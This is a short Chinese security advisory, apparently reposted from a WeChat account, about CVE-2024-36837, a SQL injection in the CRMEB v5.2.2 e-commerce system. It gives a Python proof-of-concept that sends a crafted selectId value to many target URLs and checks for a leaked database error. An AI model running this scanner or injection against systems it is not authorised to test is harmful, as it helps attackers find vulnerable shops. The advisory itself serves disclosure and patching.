0x00 前言
西安众邦网络科技有限公司是一家致力于互联网软件设计、研发、销售为一体的高新技术企业。自2014年成立以来,众邦科技将客户关系管理与电子商务应用场景进行深度集成,围绕新零售、智慧商业、企业数字化经营等课题进行探索创新,打造出中国私有化独立应用电商软件知名品牌——CRMEB。
CRMEB通过“去中心化”的新零售解决方案,助力企业实现公域流量向私域流量的转化;以性能稳定、高并发、云部署的核心技术赋能开发者,提速企业数字化;通过开源核心产品、核心技术,吸引第三方开发者加入并打造出CRMEB产品生态,为广大商家提供更多应用选择与更优质的服务。
CRMEB开发有开源打通版、标准版、Pro版、多店版、多商户、Java版、外贸版、知识付费等多款系统。
0x01 漏洞描述
CRMEB v.5.2.2版本存在安全漏洞,该漏洞源于存在SQL注入漏洞,允许远程攻击者通过ProductController.php文件中的getProductList函数获取敏感信息。
0x02 CVE编号
CVE-2024-36837
0x03 影响版本
CRMEB v.5.2.2
0x04 漏洞详情
POC:
https://github.com/phtcloud-dev/CVE-2024-36837
import requests
def check_vulnerability(url):
# Remove trailing slash if present
if url.endswith('/'):
url = url[:-1]
# Construct the URL with the required endpoint
test_url = f"{url}/api/products?limit=20&priceOrder=&salesOrder=&selectId=)"
try:
response = requests.get(test_url)
# Check if the response contains the specific string indicating a vulnerability
if 'PDOConnection.php' in response.text:
print(f"�33[31m[HIGH RISK]�33[0m Vulnerability found in: {url}")
else:
print(f"�33[32m[SAFE]�33[0m No vulnerability found in: {url}")
except requests.RequestException as e:
print(f"�33[33m[ERROR]�33[0m Could not connect to {url}. ")#Error: {e}")
def main():
# Read URLs from url.txt
with open('url.txt', 'r') as file:
urls = file.readlines()
for url in urls:
url = url.strip() # Remove any leading/trailing whitespace characters
if not url.startswith('http'):
url = 'http://' + url # Add http scheme if missing
check_vulnerability(url)
if __name__ == "__main__":
main()
0x05 参考链接
https://github.com/crmeb/CRMEB
https://github.com/phtcloud-dev/CVE-2024-36837
原文始发于微信公众号(信安百科):CVE-2024-36837|CRMEB电商管理系统存在SQL 注入漏洞(POC)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论